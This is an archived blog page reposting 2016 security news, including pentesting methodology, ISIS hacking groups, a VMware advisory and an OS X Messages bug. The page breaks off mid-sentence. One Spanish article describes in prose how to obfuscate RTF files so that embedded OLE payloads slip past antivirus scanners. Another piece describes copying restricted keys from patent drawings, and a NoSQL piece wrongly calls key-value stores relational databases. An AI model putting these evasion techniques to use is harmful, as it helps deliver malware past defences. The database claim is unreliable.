Month: April 2016
METODOLOGÍAS DE PRUEBAS DE SEGURIDAD INFORMÁTICA
Hoy en día los ataques cibernéticos se producen no sólo en empresas grandes sino también en PYMES en los países como México, Brasil, Estados Unidos, Colombia, Costa Rica, Argentina, UAE, India etc acuerdo con el informe de las empresas de servicios de pruebas de seguridad informática/pruebas de penetración. La seguridad informática es muy fundamental, ya que la pérdida o el robo de datos confidenciales es un riesgo que una empresa, por pequeña que sea, no se puede permitir. Existen las evidencias estadísticas, avaladas por empresa de pentesting; indicando que estos casos son mucho más numerosos en empresas más pequeñas, en dónde la seguridad informática es mínima. Dependiendo del entorno de la empresa, se puede tener diferentes riegos/vulnerabilidades que pueden comprometer a los objetivos empresariales.
Para estar protegido ante cualquier riesgo informático, una empresa tiene dos alternativas. La primera alternativa es tomar la ayuda de expertos de los servicios de pruebas de seguridad informática (pruebas de penetración) y hacer las pruebas de auditoría informática para detectar y solucionar los riesgos. Segunda alternativa es capacitar su equipo de TI con cursos de pruebas de penetración, por lo que su equipo puede entender, detectar, resolver las vulnerabilidades informáticas. El objetivo de los servicios de pruebas de seguridad informática (pruebas de penetración) es la preservación de la confidencialidad, la integridad y la disponibilidad de los sistemas de información. Las pruebas de auditoría informática y cursos de pruebas de penetración forman una parte integral de los servicios de pruebas de seguridad informática (pruebas de penetración).
Las pruebas de auditoría informática usualmente se clasifican en tres clases: pruebas de auditoría informática física, pruebas de auditoría informática lógica o técnica y pruebas de auditoría informática administrativa. Según los expertos de servicios de pruebas de seguridad informática de software (pruebas de penetración), para que las pruebas de auditoría informática sean efectivas, éstas deben estar integradas en una arquitectura de seguridad informática, la cual debe ser conforme con los objetivos empresariales y las posibles vulnerabilidades de acuerdo al impacto que éstas tengan en la empresa. Por lo tanto, una etapa principal en la implementación de la arquitectura de seguridad informática es la etapa de pruebas de auditoría informática. Las empresas pueden implementar eso con la ayuda de los servicios o los cursos.
Según el profesor del curso de pruebas de penetración, los servicios de pruebas de seguridad informática (pruebas de penetración) deben considerar los siguientes pasos:
1. Definir los activos informáticos a probar.
2. Identificar las vulnerabilidades con la ayuda del pentest interno (evaluación interna) y el pentest externo (evaluación externa).
3. Establecer las probabilidades de la ocurrencia de las vulnerabilidades informáticas que puedan comprometer la seguridad de los activos.
4. Calcular el impacto y la prioridad de cada vulnerabilidad detectada durante el pentest interno (evaluación interna) y el pentest externo (evaluación externa).
5. Al terminación de pentest interno (evaluación interna) y pentest externo (evaluación externa), documentar los detalles, impactos, prioridades de las vulnerabilidades informáticas.
6. Trabajar con el equipo del cliente para implementar soluciones de seguridad y resolver las vulnerabilidades informáticas detectadas durante pentest interno (evaluación interna) y pentest externo (evaluación externa).
7. Rehacer pentest interno (evaluación interna) y pentest externo (evaluación externa) otra vez para asegurar la implementación de la arquitectura de seguridad.
A continuación son diferentes tipos de servicios de pruebas de seguridad informática (pruebas de penetración).
PRUEBAS DE SEGURIDAD INFORMÁTICA/PENTESTING DE INFRAESTRUCTURA INFORMÁTICA
Los servicios de las pruebas de seguridad informática/ pruebas de penetración/ pentesting de infraestructura informática están clasificados por tipos de los riesgos informáticos. La infraestructura informática incluye infraestructura inalámbrico, alámbrico y móvil. Existen dos tipos de pruebas de penetración/ pentesting de infraestructura informática.
PENTEST INTERNO (EVALUACIÓN INTERNA)
Pentest interno es también conocido como la evaluación interna. Pentest interno es una evaluación crítica, sistemática y detallada de redes informáticas. Generalmente un pentest interno es realizado por los profesionales de empresa de pentesting, utilizando técnicas establecidas con el objeto de emitir informes y formular sugerencias para el mejoramiento de la seguridad. El pentest interno es la evaluación interna del perfil de seguridad de la empresa desde la perspectiva de un empleado o de alguien que tiene acceso a los sistemas o desde la perspectiva de un hacker que ha obtenido acceso a la red de la empresa. Pentest interno/evaluación interna le permite reducir el riesgo de un ataque por parte de empleados internos e implementar una arquitectura de seguridad en las redes informáticas. Según las recomendaciones de expertos de empresa de pentesting, el servicio de pentest interno/ evaluación interna debe cubrir todos los nuevos tipos de ataques internos y no sólo probar los ataques convencionales. Por otra parte los profesionales de las empresas pueden aprender todo sobre pentest interno/ evaluación interna y nuevos tipos de ataques durante el curso de pruebas de penetración.
PENTEST EXTERNO (EVALUACIÓN EXTERNA)
Pentest externo es también conocido como evaluación externa. Pentest externo es una evaluación crítica, sistemática y detallada de redes informáticas desde afuera. Generalmente un pentest externo es realizado por los profesionales de empresa de pentesting, utilizando técnicas establecidas con el objeto de emitir informes y formular sugerencias para el mejoramiento de la seguridad. El pentest externo es la evaluación externa del entorno de seguridad de una empresa desde la perspectiva de un hacker a través de internet o de alguien que no tiene acceso a los recursos informáticos. Pentest externo/ evaluación externa le permite identificar y solucionar vulnerabilidades informáticas antes que los hackers puedan comprometer la información confidencial. Según las recomendaciones de expertos de empresa de pentesting, el servicio de pentest externo/ evaluación externa debe cubrir todos los nuevos tipos de ataques externos y no sólo probar los ataques convencionales. Por otra parte los profesionales de las empresas pueden aprender todo sobre pentest externo/ evaluación externa y nuevos tipos de ataques durante el curso de pruebas de penetración.
PRUEBAS DE SEGURIDAD INFORMÁTICA DE SOFTWARE/PENTESTING DE APLICACIONES WEB
Actualmente, muchas empresas manejan software o aplicaciones web que no incluyen las verificaciones de seguridad y un hacker puede robar los datos empresariales fácilmente. Con el servicio de pruebas de seguridad informática de software las empresas pueden verificar y resolver los diferentes tipos de vulnerabilidades que puedan existir en las aplicaciones web. La prueba de penetración de aplicación web, es una evaluación de seguridad informática; comparada con los criterios definidos para la seguridad de aplicaciones. Las pruebas de penetración de aplicaciones pueden ser clasificadas como pruebas manuales de penetración de aplicaciones web y pruebas automatizadas de penetración de aplicaciones web con herramientas. Según las recomendaciones de expertos de empresa de pentesting, el servicio de pruebas de seguridad informática de software debe cubrir todos los nuevos tipos de ataques y no sólo probar los ataques convencionales. Por otra parte los profesionales de las empresas pueden aprender cómo construir una aplicación web segura, cómo hacer auditoria del código, cómo hacer programación segura, cómo hacer pruebas de penetración de aplicaciones web y nuevos tipos de ataques durante el curso de pruebas de penetración.
PRUEBAS DE SEGURIDAD INFORMÁTICA EN LA NUBE
La computación en nube ayuda a las empresas a reducir los gastos en la infraestructura informática, la mejora de la flexibilidad, la fuerza de trabajo globalizado y mucho más. Sin embargo las empresas están muy preocupadas por la seguridad de sus datos y quién más pueda acceder a sus recursos sin su conocimiento. Las pruebas de penetración en el entorno de la nube también se conocen como pruebas de seguridad en la nube. Las pruebas de seguridad informática en la nube incluyen el análisis, evaluación y resolución de las vulnerabilidades informáticas en el entorno de la nube. Con la ayuda de los servicios de pruebas de seguridad informática (pruebas de penetración) en la nube, las empresas pueden aprovechar todos los ahorros que una nube da junto con la seguridad en el entorno de la nube. Además esto ayudaría a los clientes de las empresas, ya que van a sentir confidente en guardar sus datos personales en la nube. Una empresa de pentesting debe trabajar de acuerdo con las mejores prácticas de la industria para la seguridad en la nube y se debe implementar pruebas de penetración según recomendaciones de Cloud Security Alliance (CSA) y Cyber Defense Council (CDC). Según las recomendaciones de expertos de empresa de pentesting, el servicio de prueba de seguridad informática en la nube debe cubrir todos los nuevos tipos de ataques y no sólo probar los ataques convencionales. Por otra parte los profesionales de las empresas pueden aprender cómo asegurar la nube, cómo hacer auditoria en la nube, cómo hacer pruebas de penetración en la nube y nuevos tipos de ataques durante el curso de pruebas de penetración de nube.
PRUEBAS DE SEGURIDAD INFORMÁTICA DE SISTEMAS SCADA, ICS, IACS
Supervisory Control and Data Acquisition (SCADA), Industrial Control Systems (ICS) e Industrial Automation and Control Systems (IACS) son equipos utilizados para el control de los entornos industriales. Estos sistemas se utilizan en el sector energético, el sector manufacturero y la infraestructura crítica como las plantas nucleares, plantas de energía, etc. Las pruebas de penetración de los entornos SCADA, ICS e IACS también se conocen como pruebas de seguridad de la infraestructura crítica. Pruebas de seguridad de la infraestructura crítica implican el análisis, la evaluación y validación de seguridad de la infraestructura crítica usando sistemas SCADA, ICS e IACS. Evaluación de seguridad de sistemas SCADA, ICS e IACS y servicio de pruebas de penetración ayudan a las organizaciones a proteger la infraestructura crítica, ya que puede ser un asunto de seguridad nacional. Una empresa de pentesting, debe trabajar de acuerdo con las mejores prácticas de la industria para las pruebas de seguridad de la infraestructura crítica y debe colaborar con los proveedores de sistema SCADA, ICS e IACS para arreglar las vulnerabilidades descubiertas. Según las recomendaciones de expertos de empresa de pentesting, el servicio de prueba de seguridad informática de sistemas SCADA, ICS e IACS debe cubrir todos los nuevos tipos de ataques y no sólo probar los ataques convencionales. Por otra parte los profesionales de las empresas pueden aprender cómo asegurar sistemas SCADA, ICS e IACS, cómo hacer auditoria de sistemas SCADA, ICS e IACS, cómo hacer pruebas de penetración de infraestructura crítica y nuevos tipos de ataques durante el curso de pruebas de penetración de SCADA, ICS e IACS.
Empresas pueden proteger la infraestructura informática e información confidencial cuando conocen más acerca de las vulnerabilidades y controles de seguridad. Los servicios de pruebas de seguridad informática de software y cursos de pruebas de penetración deben proporcionar una comprensión completa de pruebas de penetración y sus perfiles de seguridad. Deben trabajar con sus clientes para definir y poner en práctica la estrategia correcta de pruebas de seguridad informática de software (pruebas de penetración) e implementar la arquitectura de seguridad.
Deben usar servicios de una empresa con experiencia global en el sector privado y gobierno con los servicios de pruebas de seguridad informática de software y cursos de pruebas de penetración. Con ayuda de capacitación de pruebas de penetración, profesionales de empresas pueden construir una imagen completa de su perfil de seguridad informática y tener una visión clara de cómo estar preparado para enfrentar los riegos informáticos.
fuente:http://www.iicybersecurity.com/pruebas-de-seguridad-informatica-pentest.html
As US drops “cyber bombs,” ISIS retools its own cyber army
The Islamic State has been deft in its use of the Internet as a communications tool. ISIS has long leveraged social media to spread propaganda and even coordinate targets for attacks, using an ever-shifting collection of social media accounts for recruitment and even to call for attacks on individuals ISIS leaders have designated as enemies. But the organization’s efforts to build a sophisticated internal “cyber army” to conduct information warfare against the US and other powers opposing it have thus far been fragmented and limited in their effectiveness—and more often than not they’ve been more propaganda than substance.
Now, ISIS is taking another crack at building a more credible cyber force. As analysts from Flashpoint note in a report being published today (entitled “Hacking for ISIS: The Emergent Cyber Threat Landscape”), ISIS earlier this month apparently merged four separate pro-ISIS “cyber” teams into a single group called the United Cyber Caliphate.
“Until recently, our analysis of the group’s overall capabilities indicated that they were neither advanced nor did they demonstrate sophisticated targeting,” said Laith Alkhouri, Director of Research & Analysis for the Middle East and North Africa and a co-founder at Flashpoint. “With the latest unification of multiple pro-ISIS cyber groups under one umbrella, there now appears to be a higher interest and willingness amongst ISIS supporters in coordinating and elevating cyber attacks against governments and companies.”
But interest and willingness doesn’t necessarily equal capability. There’s room for doubt about the authenticity of this group thanks to mixed messages broadcast over Telegram (ISIS’ preferred secure communications channel for propaganda and recruitment) and Twitter. And ISIS’ hacking efforts so far have been less than sophisticated, with the most recent “wins” being a compromise of the Twitter and YouTube accounts of the US Central Command (CENTCOM) and Newsweek in January 2015.
One trick pony
ISIS’ early efforts to create a hacking unit, the Cyber Caliphate Army, began in the summer of 2014. Led, and possibly consisting entirely of Junaid Hussain, a hacker from Birmingham, England and a former leading member of the black hat “security research group” TeaMp0isoN. Hussain, thenknown as “TriCK,” was arrested in 2012. He joined ISIS shortly after his release, taking the name Abu Hussain al Britani. From the summer of 2014 until Hussain was taken out by a drone strike in August of 2015 the Cyber Caliphate Army claimed responsibility for a number of social media account takeovers, website defacements, and other activities.
Among those were the CENTCOM and Newsweek social media defacements, as well as attacks on sites of the City of Albuquerque, New Mexico and a TV station in Salisbury, Maryland, and the alleged theft of documents from the Tennessee Fusion Center—an intelligence clearing house for local, state, and federal law enforcement run by the Tennessee Bureau of Investigations. The Fusion Center breach allegedly exposed “For Official Use Only” and law enforcement sensitive documents, but these documents may have come from hacked e-mail accounts on Fusion Center mailing lists.
Hussain used his connections to the hacker world in an attempt to bolster ISIS’ otherwise limited cyber capabilities. But aside from a data dump on August 11, 2015 allegedly containing the addresses and contact information for over 1,500 US service members by the “Islamic State Hacking Division”—actually acquired from a hacker in Kosovo—Hussain appears to have been unsuccessful in bringing any of his contacts from his TeaMp0isonN days to ISIS’ cause.
Off-the-shelf hacks
The activities of ISIS “cyber” groups after Hussain’s death have been limited to those typical of small groups of “hacktivists”: indiscriminate Web defacements, claims of bigger hacks that appear to be based on the work of others, and claims of responsibility for unscheduled system outages. Rabitat Al-Ansar (League of Supporters), a wing of ISIS’ Media Front propaganda collective, claimed to have stolen “American Visa and MasterCard” data in July of 2015—but in actual fact the data appeared to have been obtained from previous breaches off a “carder” forum. Another purported ISIS hacking group, the Sons Caliphate Army, claimed to be behind a Twitter outage in February 2016.
The April “formation” of the United Cyber Caliphate from four other ISIS hacking “brands”—the Sons Caliphate Army, the Caliphate Cyber Army, and groups called the Ghost Caliphate Section and Kalashnikov E-Security Team—may be part of an effort to simplify ISIS hacker recruitment effort in the wake of Hussain’s death. Leveraging publicly available hacker tools, “malware as a service” exploit sites, and other tools and services ISIS can buy off hacker forums such as the jihad-focused Gaza Hacker Web, the UCC could bolt together some attacks capable of creating a bit more propaganda for ISIS and causing damage to “soft” targets.
But it’s unlikely that UCC will be able to counter attacks launched against ISIS by US Cyber Command, the National Security Agency, and other allied nations’ military and intelligence agencies in any meaningful way. And given the questionable nature of some of the claimed successes of its components, combining them may result in more posturing than actual hacking.
Source:http://arstechnica.com/
How To Stay Safe On The Internet — Google Tells 5 Must Know Tips
Short Bytes: For unlucky people, the internet could be a dangerous place. Make sure that you follow basic security practices and think twice before sharing some personal information on the web. In this article, I’ll tell you 5 must know internet safety tips from Google. Don’t miss this.
The internet is a place where people visit for various reason. While you might be online for work or watching some cute cat videos, there are others who are looking to harm you via different means.
Very often you might end up losing your personal information and risk your online safety while banking, shopping and chatting with friends.
Experienced internet users know that there are various online risks and they follow various safety measures. Talking about the experience, who could give a better advice that Google.
Here are the 5 must-know tips from Google that tell how to stay safe on the internet:
Tip 1: Think Before You Share
Before sharing something online, make sure that the information isn’t too personal as it could be forwarded, copied and found. Whatever you share, and how much you share, can tell a lot about you. So, be thoughtful.
Tip 2: Protect Your Stuff
One of the basic steps to ensure our online safety is choosing strong passwords. This looks down your devices and accounts, barring unwanted account access.
Tip 3: Know & Use Your Settings
Very often people skip the basic security settings while setting up their accounts and ignore the authentication methods. The settings on different sites allow you to select what you share and who you share with. Make sure that you understand these settings and safeguard your posts, videos, profiles and more.
Tip 4: Avoid Scams
With more people coming online and taking part in the process of connecting with each other, the online scams are on the rise. If someone offers you some free item or some lottery money, it’s wise to be suspicious. Make sure that you avoid such scams and protect your personal information.
Tip 5: Be Positive
Remember this line — Treat others the way you want to be treated, offline and online!
Make sure that you remain positive and post or comment something if you wouldn’t mind someone doing the same to you.
Source:http://fossbytes.com/
This man hacked Windows 10 to run on in-car display
Someone got their Windows 10 Mobile phone to work with their in-car display. Windows 10 Mobile can only work on your car’s display if you possess a little know how regarding your car’s internal system. One car owner by the name of Matthew Johnston possessed an HDMI port in the car’s display, and he was able to hook up a Windows 10 Mobile phone and have it work on that screen.
After he was successfully able to perform the hack, Matthew Johnson quickly went to Twitter and informed the public of his latest feat. Using a Pioneer in-car display, connecting a phone to its HDMI-in port seems to make this hack possible.
Unfortunately, the only drawback to this is that Johnson has reported that the display is not a touchscreen, so he will not be able to access all the features that you get while using a physical Windows 10 Mobile smartphone. However, if the right hardware is present inside vehicles, then you will actually be able to use Windows Continuum.
Microsoft should really give some thought of branching out its Windows 10 Mobile OS to vehicles the same way that Android and iOS have done. It will take a fair bit of work, but Microsoft’s forte for all these years has always been software.
Source:http://www.techworm.net/
Lock-hackers crack restricted keys used to secure data centres
Patented keys have high-quality drawings in plain sight. Bsides Canberra A group of Melbourne lock-pickers have forged a creative method for popping so-called restricted locks by 3D printing keys found on freely-available designs on patent sites.
The feat demonstrated at the BSides Canberra security conference last week is a combination of opportunistic ingenuity and lock-picking mastery, and will be warmly-received by red team penetration testers and criminals alike.
Lock-picking is common within the information security industry, is a staple at hacker conventions, and is becoming an increasingly used skill as part of anything-goes attempts to access controlled areas wherein computers can be found.
Restricted keys are controlled by limiting manufacture to expensive specialist locksmiths who require licences and specific machinery to produce the keys.
Locks using the keys are used across enterprises to secure sensitive areas such as offices and data centres.
Now a Loop security consultant known as “Topy”, and his fellow lockpickers say restricted keys have become skeletons in the security closet.
Their plastic, 3D-printed blank keys are sufficiently strong to be used multiple times without breaking.
With such keys in hand, a lock-picker can obtain the cylinder from a vulnerable lock – say one at the external gate of a targeted facility – to learn the master key pattern which can then be applied to the 3D printed blank restricted key.
“The restricted keys have ‘do not copy’ stamped on them, but unfortunately it doesn’t really mean anything,” Topy told hackers.
“In Melbourne you can’t get restricted keys from locksmiths no matter how nicely you ask them … so we decided to make them ourselves.
“The shape of the keys is patented and that means you can go online and search the database for very high quality images.”
The key blanks are often scalable vector images with precise measurements that allowed Topy and his colleagues to create computer-aided designs of many restricted keys.
Cracking restricted keys enables an attack whereby a restricted lock is removed from a gate – which takes just two well-placed cuts of a rotary tool – and a replacement that accepts any key is inserted. The attack therefore goes undetected.
The lock picker can then extract the original lock’s cylinder and tap out the pins within. Each can be measured and used to build the respective restricted master key.
Topy says master keys are used in scores of businesses, utilities, and government buildings where separate levels of physical access are required for staff with different levels of security clearance.
There are some scenarios in Australia where highly-sensitive master keys can be derived from extremely vulnerable environments, but the details of those attacks are being kept under wraps until the situation can be resolved.
Topy and his colleagues developed the attack in a hired warehouse dubbed HackHouse, and are working on new methods to overcome high-security locks.
His attacks, like many other emerging information security exploits, are not needed to break into many secured areas since businesses and individuals typically buy cheap and easily-poppable locks.
Lock-picking is a staple of security conferences. Hang around and you’ll see ATMS, wafer and tumbler locks and every type of handcuff on the market picked apart.
Even rudimentary lock-pickings skills sometimes aren’t needed to access secure areas, as many organisations use key safes to store master keys. But those safes can be opened using weakly-protected combination locks.
¿Cómo crear archivos maliciososde tipo RTF yarchivos indetectables por antivirus?
El formato RTF siempre ha sido considerado como bastante seguro en comparación con otros formatos de MS Office. Es cierto que RTF no puede contener macros. Sin embargo, se sabe mucho menos que los documentos RTF pueden contener objetos OLE con contenido potencialmente malicioso. Y más específicamente, objetos OLE pueden almacenar cualquier archivo, incluyendo los ejecutables y scripts según expertos de hacking ético y análisis de vulnerabilidades informáticas. Si el usuario final hace doble clic en un objeto tal, el archivo incrustado será abierto por el sistema. Esta característica se utiliza activamente para entregar el malware en la vida real, como veremos más adelante.
Según los expertos, al hacer una prueba muy rápida utilizando un simple RTF documento con un objeto OLE que contiene el archivo de prueba EICAR: en VirusTotal, 30 de los 56 motores antivirus detectan el archivo EICAR. Esto puede ser sorprendente como cabría esperar 100% de detección. Sin embargo, después de aplicar todos los trucos descritos en este artículo, sólo 6 motores antivirus de 56 detectan algo sospechoso. Pero fuera de esos 6, solo dos realmente detectan el archivo EICAR correctamente. Para los otros 4 informes, el archivo RTF es malformado o alterada.
Estos trucos descritos pueden utilizarse para ocultar cargas maliciosas que no serán recogidos por la mayoría de gateways de correo electrónico, proxy web y sistemas de detección de intrusos. Y ya han sido utilizados para varias campañas de malware acuerdo con las experiencias de expertos de hacking ético y análisis de vulnerabilidades informáticas. Siguientes son algunas técnicas que usted podría usar para insertar contenido potencialmente malicioso en archivos RTF.
Cabecera RTF incompleta
En lugar de comenzar con “{\rtf1” como se describe en las especificaciones de MS, algunas muestras comienzan con “{\rt0” o “{\rtvpn”. Por ejemplo éste (SHA256: 04beed90f6a7762d84a455f8855567906de079f48ddaabe311a6a281e90bd36f):
MS Word acepta como documentos RTF, mientras que muchas herramientas de análisis sólo verán archivos de texto y no van a analizar como RTF. Por ejemplo, este es el caso de malwr.com, como se muestra en la siguiente captura de pantalla:
Se ve como analizador RTF de MS Word sólo busca “{\rt” para decidir si un archivo es realmente RTF.
Impar número de dígitos hexadecimales
Los datos codificados como bytes en formato hexadecimal deben tener siempre un número par de dígitos hexadecimales. Esto puede parecer obvio, pero si se añade un dígito hexadecimal extra al final de los datos hexadecimales codificados, algunos programas de análisis puede fallar durante la descodificación de los datos. Podrían aprender más de esta metodología durante el curso de hacking ético.
Extra espacio en blanco entre hexadecimal dígitos
Datos codificados en hexadecimal producidos por MS Word está perfectamente alineados, con todos los dígitos hexadecimales agrupados. Sin embargo, según pruebas con MS Word, en realidad permite insertar espacios en blanco (incluyendo el espacio, tabulación, nueva línea, etc.) entre los números hexagonales, e incluso entre los dos dígitos hexadecimales que representan un solo byte.
Palabras de control RTF dentro de los datos codificados en hexadecimal
Acuerdo con las pruebas de análisis de vulnerabilidades informáticas, mirando en la muestra presentado antes, podemos ver que es una palabra de control adicional “{\object}” ubicada dentro de los datos codificados en hexadecimal.
MS Word simplemente ignora cualquier palabra de control inesperado. Para hacerlo aún más complejo para los programas de análisis, esas palabras de control se pueden tener,por ejemplo “{\ foo {} {\ bar}}”.
Los datos binarios dentro de los datos codificados en hexadecimal
Otras muestras de RTF, como este contienen una palabra de control “\ bin”, seguido de un montón de ceros y unos caracteres binarios, justo en el medio de un objeto hexagonal codificado. Aunque las especificaciones no mencionan esa posibilidad para los objetos OLE, se ve como MS Word lo soporta. En la práctica, se permite cualquier combinación de datos hex-codificado y binarios menciona Dan Smith, experto de hacking ético y análisis de vulnerabilidades informáticas.
Top 5 NoSQL Databases of The Last Year
These are the top NoSQL DBMS for year 2015. A database which stores data in form of key-value pair is called a relational database. Alright! let me explain myself.
a relational database stores data as tables with numerous rows and columns.(I think this one is easy to understand).
A key is a column (or set of columns) for a row, by which that row can be uniquely identified in the table.
Rest of the columns of that row are called values. These databases are created and managed by software which are called “Relational Database Management System” or RDBMS, using Structured Query Language(SQL) at its core for user’s interaction with the database.
The following video might be helpful for understanding what I’ve discussed above.
A NoSQL database is one which does not solely depend on SQL for data retrieval and whose structure is different from a relational database, and hence the name NoSQL( Not Only SQL).
And if you also think why that ‘O’ is not capital in NoSQL, then we are similar. Blame the people who named it.
Why use such databases ?
For handling “Big Data”. The development of NoSQL is fueled by development of the World Wide Web. SQL was good for Web 1.0. The evolution of Web from a place where you can only consume stuff and can not interact with the website to a place where a website works as your personal assistant, has created a scenario where a lot of data has to be processed in a very little time.
NoSQL Databases are quicker in contrast of SQL Databases and thus NoSQL Databases are utilized as a part of a Big Data applications.
Types of NoSQL Databases:
1. Document Databases – These Db usually pair each key with a complex data structure which is called a document. Documents can contain key-array pairs or key-value pairs or even nested documents. The “document” is a file which contains information. It may contain data as key value pair or as key document pair where the document may be of one of the two types.
2.Key-value stores – Every single item is stored as a Key-value pair. Key-value stores are the most simple among NoSQL Databases.
3.Wide-column stores – These types of Databases are optimized for queries over large data sets, and instead of rows they store columns of data together.
4.Graph stores – These store information about graphs, networks, such as social connections.
What about the Top 5 list?
Here they are:
1.CouchDB
CouchDB is an Open Source NoSQL Database which utilizes JSON to store information and JavaScript as its query language. CouchDB applies a type of Multi-Version Controlling system for avoiding the lockage of the DB file during writing. It is Erlang. It’s authorized under Apache.
2. MongoDB
MongoDB is the most well known among NoSQL Databases. It is an Open-Source database which is Document oriented. MongoDB is an scalable and accessible database. It is in C++. MongoDB can likewise be utilized as a file system too.
3.Cassandra
Cassandra is a distributed data storage system for handling very large amounts of structured data. Generally these data are spread out to many commodity servers. Cassandra gives you maximal flexibility to distribute the data. You can also add storage capacity of your data keeping your service online and you can do this task easily. As all the nodes in a cluster are same, there is no complex configuration to deal with. Cassandra is written in Java. It supports mapreduce with Apache Hadoop. Cassandra Query Language (CQL) is a SQL-like language for querying Cassandra Database.
4. Redis
Redis is a key-value store. Furthermore, it is the most famous key-value store according to the monthly ranking by DB-engineers.com . Redis has support for numerous languages likeC++, PHP, Ruby, Python, Perl, Scala and so forth along with many data structures like hash tables, hyperloglogs, strings etc. Redis is composed in C language.
5. HBase
HBase is a distributed and non-relational database which is designed after the BigTable database by Google. One of the main goals of HBase is to host Billions of rows X millions of columns. You can add servers anytime to increase capacity. And multiple master nodes will ensure high availability of your data. HBase is composed in Java. It’s authorized under Apache. Hbase accompanies simple to utilize Java API for customer access.
Source:http://www.techworm.net/
Canadian law enforcement obtained BlackBerry Global encryption Key
A report published by the VICE News confirmed that the Canadian law enforcement obtained the BlackBerry encryption Key under the investigation Op Clemenza.
BlackBerry is probably the first mobile vendor that implemented end-to-end encryption to protect communications of its users. Now an embarrassing report published by Vice News revealed that BlackBerry has shared a master Key to crack BlackBerry Messenger encryption with the Canadian Law enforcement.
According to the report, the Royal Canadian Mounted Police (RCMP) received a global decryption key for BlackBerry mobile devices since 2010, according to a new report from Vice News published yesterday.
“A high-level surveillance probe of Montreal’s criminal underworld shows that Canada’s federal policing agency has had a global encryption key for BlackBerry devices since 2010.” reports the Vice News.
According to the report, the Canadian police used the global encryption key for BlackBerry to decrypt over 1 Million messages sent through the BlackBerry Messenger(BBM) service by suspects in a two-year long criminal investigation.
The investigation was coded Operation Clemenza.
“The revelations are contained in a stack of court documents that were made public after members of a Montreal crime syndicate pleaded guilty to their role in a 2011 gangland murder. The documents shed light on the extent to which the smartphone manufacturer, as well as telecommunications giant Rogers, cooperated with investigators.” continues the Vice News.
“According to technical reports by the Royal Canadian Mounted Police that were filed in court, law enforcement intercepted and decrypted roughly one million PIN-to-PIN BlackBerry messages in connection with the probe.”
The report confirms that the company used the same global encryption key to protect all its customers, even when the devices use by private companies used encryption keys generated by their servers.
The circumstance is disconcerting because it implies that the Canadian police had the opportunity to spy on government and business clients using BlackBerry devices.
Both BlackBerry and the Royal Canadian Mounted Police fought against the order to provide details about their cooperation.
It is still not clear how the Canadian authorities obtained the global encryption key, neither if they are still in possession of the keys.
It is easy to speculate that the company gave the keys to the Royal Canadian Mounted Police.
The Vice News reported a statement of the RCMP included in one of the document it analyzed that confirmed the Canadia Government had obtained “the key that would unlock the doors of all the houses of the people who use the provider’s services, and that, without their knowledge.”
Source:http://securityaffairs.co/
Patch the VMware Client Integration Plugin asap
VMware issued a security update to fix a critical vulnerability in the VMware Client Integration Plugin, apply it as soon as possible.
VMware issued a Security Advisory related to a critical security vulnerability (CVE-2016-2076) in the VMware Client Integration Plugin urging administrators to urgently apply the needed patch.
The flaw could be exploited by attackers to launch a Man in the Middle attack or Web session hijacking under certain conditions. The problem resides in the way the VMware Client Integration Plugin handles session content.
“The VMware Client Integration Plugin does not handle session content in a safe way. This may allow for a Man in the Middle attack or Web session hijacking in case the user of the vSphere Web Client visits a malicious Web site.” states the VMware advisory.
The vulnerability affects the following versions of the VMware Client Integration Plugin shipped with:
- vCenter Server 6.0 (any 6.0 version up to 6.0 U2)
- vCenter Server 5.5 U3a, U3b, U3c
- vCloud Director 5.5.5
- vRealize Automation Identity Appliance 6.2.4
The experts at VMware highlighted that in order to solve the issue, both the server side (i.e. vCenter Server, vCloud Director, and vRealize Automation Identity Appliance)
and the client side (i.e. CIP of the vSphere Web Client) need to be updated.
Below the procedure to install the security updates:
- A) Install an updated version of:
– vCenter Server
– vCloud Director
– vRealize Automation Identity Appliance - B) After step A), update the Client Integration Plugin on the system
from which the vSphere Web Client is used.
Updating the plugin on vSphere and vRA Identity Appliance is
explained in VMware Knowledge Base article 2145066.
Updating the plugin on vCloud Director is initiated by a prompt
when connecting the vSphere Web Client to the updated version of
vCloud Director.
Source:http://securityaffairs.co/
Hackers help to steal petrol, coal and more as criminals eye industrial systems
Poorly defended Scada systems offer rich picking to crime gangs, warns Kaspersky. Hackers are helping to steal commodities including coal, petrol and grain as criminals turn their attention to attacking industrial control systems.
Industrial control systems have run production lines and other processes for decades, but are now being connected to the internet to allow them to be monitored remotely. But as these systems were not designed with this online connectivity in mind, they are often much harder to secure from hackers, making them a tempting target for gangs.
Eugene Kaspersky, CEO of security company Kaspersky, said attacks on industrial control systems and Supervisory Control And Data Acquisition (Scada) systems are on the rise.
For example, he said gangs were hacking systems that control the temperature of petrol – which affects the volume – so that they could fit more into tankers. “So when they fill their big tank they hack the Scada system and they decrease the temperature so they can get extra petrol into the tank,” he said. After making deliveries to petrol stations the tanker is left with extra petrol, he said.
“At the end of the day they have two or three percent extra left,” he said, speaking at the Cloud Expo Europe event in London.
A similar trick he said was being used in by criminals to steal coal by hacking into the system that weighs how much coal is loaded into wagons.
“They steal the coal by hacking the computer systems,” he said.
“Traditional crime is getting more and more smart and cyber,” he said. One problem with investigating these crimes is that they fall in between specialised cybercrime units and standard police, he added.
The security of industrial control systems has long been a concern to governments, who worry that critical national infrastructure could be damaged by digital attack. And as well as criminals exploiting insecure industrial systems, Kaspersky said there is a danger that terrorists will try to do the same.
“Traditional crime employs cybercriminals, hackers to attack systems. I’m afraid it is just a question of time [before] terrorists will employ computer geeks to attack critical infrastructure and I am afraid there are people in the cyberspace who will do anything you want for money,” he said, pointing to the recent ransomware attacks which hit hospitals in the US and Europe. “Don’t think that the computer geeks, the cyber criminals, are good guys,” he warned.
Kaspersky also said that professional criminal groups, mostly Russian-speaking, now have the same level of complexity as state sponsored attackers.
He said, in one example, three gangs had worked together on attacking a bank: one gang cracked the bank and gave access to the bank network to the second gang, the second gang took the money out and the third gang collected the cash
“They work like an enterprise – they have management, they have engineers, they have lawyers, because they have enough money to pay for the best lawyers,” he said.
Source:http://www.zdnet.com/
Bug in OS X Messages App Lets Attackers Steal Your Chat History
Don’t worry, Apple’s precious crypto is fine. A trio of researchers from security firm Bishop Fox revealed last week a way to exploit Apple’s OS X Messages app that allows attackers to steal a victim’s chat history.
The vulnerability does not attack the app’s encryption capabilities but relies on local software bugs and a little bit of social engineering, requiring victims only to click on a link supplied by the malicious third-party.
But don’t panic, according to the three security researchers, the bug was properly reported to Apple’s staff, who already fixed it in their regular monthly security update last March.
This issue was revealed only last week to allow the majority of users to upgrade their apps. If you’re using the latest versions of OS X and the Messages app, then you have nothing to fear about.
The bug was a classic XSS
